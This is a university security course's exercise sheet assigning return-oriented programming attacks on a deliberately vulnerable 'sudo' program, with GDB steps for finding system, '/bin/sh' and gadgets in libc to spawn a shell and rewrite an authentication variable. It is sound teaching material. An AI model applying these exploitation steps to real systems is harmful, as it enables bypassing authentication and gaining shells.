Introduction to Information Security
Exercise 5 Download exercise 5 from our website (https://course.cs.tau.ac.il/infosec16/exercises), run ex_unpack on the exercise file and a target directory, and the specified file should be extracted into the specified directory, with the sudo, sudo.c, and assemble.py files, and the pack.py script. To all questions please append a .txt that documents your work and describes your thought process in your own words!
Questions
1. The sudo is similar to that of exercise 3, except it doesn't actually run a command (just prints "Victory!" if you hack the password correctly), and its check_password function is slightly different. Oh, and its stack is no longer executable. Use the stack overflow and return-oriented programming (ROP) to make the sudo run a shell. To do that, you'll have to find the addresses of the standard C library function system, and the "/bin/sh" string (which is, surprisingly, also in libc). Since the standard C library is linked dynamically, it's better to use GDB than IDA in this case. Run the program, break somewhere, and look for the addresses; finding system is as easy as printing it, and finding "/bin/sh" can be done with the find command, which accepts a range and a string, and looks for that string in that range (for example, find 0x8048100, 0x8048200, "foo"). You'll notice that once you exit the shell, the sudo resumes and crashes. Find the exit function, and write your shellcode so that after the shell exits, the sudo exits cleanly with the 0x42 exit status (you can see a program's exit status by running echo $? immediately after it exits).
1
Introduction to Information Security
So then, write a Python script q1.py which uses the vulnerable sudo to open a shell, and then exit cleanly with the exit status of 0x42, and describe your solution in q1.txt.
2. This time we'll be writing some actual code using ROP - namely, we'll change the global auth variable to make the sudo print "Victory!". To do that, open GDB, and run info files to see what's mapped where. Find libc's text segment, and use the dump binary memory command, which accepts a filename and a range, and copies the memory in that range to that file (for example, dump binary memory libc.bin 0x8048100 0x8048200). The reason we did that is so we can look for gadgets - snippets of opcodes that do what we want to do, and then RET. This may sound complicated, but it's as simple as writing our gadget, running our beloved assemble.py to translate it to code, and using Python to find that code in libc's text segment dump.
Write a Python script q2.py which makes the vulnerable sudo print "Victory!" by changing the global auth variable (it may then crash), and describe your solution in q2.txt.
2
Introduction to Information Security
Here are some screenshots of what solving question 2 looks like, to help you get started.
3
Introduction to Information Security
3. Create an ROP shellcode that loops infinitely to print the string “Hello, World! \n”. To document your gadgets please create a ‘q3_1_gadgets.csv’ (csv = Comma Separated Values) Example fake file content: question, main opcode, address_in_libc, what_does_it_do 3.1.9, POP EDI, 0x7F4E5056, “MOV EDI, CONSTANT” 3.1.10, POP ESI, 0x7F4E5058, “MOV [EDI], CONSTANT” 3.1.10, MOV [EDI], ESI, 0x7F4E5159, “MOV [EDI], CONSTANT” while (1) { int ch = 0; printf("Hello, World! %d\n", STUDENT_ID); } 4
Introduction to Information Security
To print this string please follow the steps bellow: 3.1. Find a gadgets (or a combination of gadgets) that do the following
Remember Gadgets cannot contain 0.
3.1.1. MOV EBP from a constant [1pts] 3.1.2. MOV ESP’s content to one of registers EAX, EBX, ECX, or EDX [2pts] 3.1.3. ADD from a constant to one of the registers. [2pts] 3.1.4. MOV REGISTER to [register+SOME_CONSTANT] [2pts] 3.2. Find the address to puts (within libc) [1pts] 3.3. Add the hello, world! String at the end of your shellcode ? 3.3.1. Why at the end ? [1pts] 3.4. Build out the ROP shellcode so that it does the following [15pts]
Assumes stack is constant between runs.
3.4.1. Put pointer to puts in EBP 3.4.2. Jump to puts 3.4.3. Skip next 8 bytes (HINT: use a double POP) 3.4.4. Add 4 bytes with pointer to string and student id. [ if you have 0 in your student id DWORD change it to 2e, for simplicity] eg.: student id: 316049152 would appear as in memory as: 0x12D6872E (instead of 0x12D68700) and will be printed as 316049198 3.4.5. Loop to 3.4.1 FILES REQUIRED: q3_1_gadgets.csv, q3.txt – thoughts and docs, q3_4.py – same as q2.py but with new rop, student_id.txt – contains the student id. 4. Bonus [25pts]: Print, but wait for user input before exiting: while (1) { int ch = 0; puts("Hello, World! %d\n", STUDENT_ID); ch = getchar(); if (ch == 'q') exit(123); }
5
Introduction to Information Security
To implement this code, you’ll first need to find the address of exit, getchar, and puts. You’ll also need to use the conditional jumps described in class. FILES REQUIRED: q4.py – same as q2.py but with relevant ROP, q4.txt – thoughts and docs
COPYING OR WORKING IN GROUPS (TWO OR MORE) OR USING REFERENCES WILL RESULT IN IMMEDIATE DISQUALIFICATION FROM THE COURSE! (ESPECIALLY, FOR THE BONUS)
Run ex_pack on the exercise directory, enter your student ID, and the specified directory should be compressed into a zip file which you are to submit. It will also run the pack.py script, which will make sure all your files are present and valid.
6
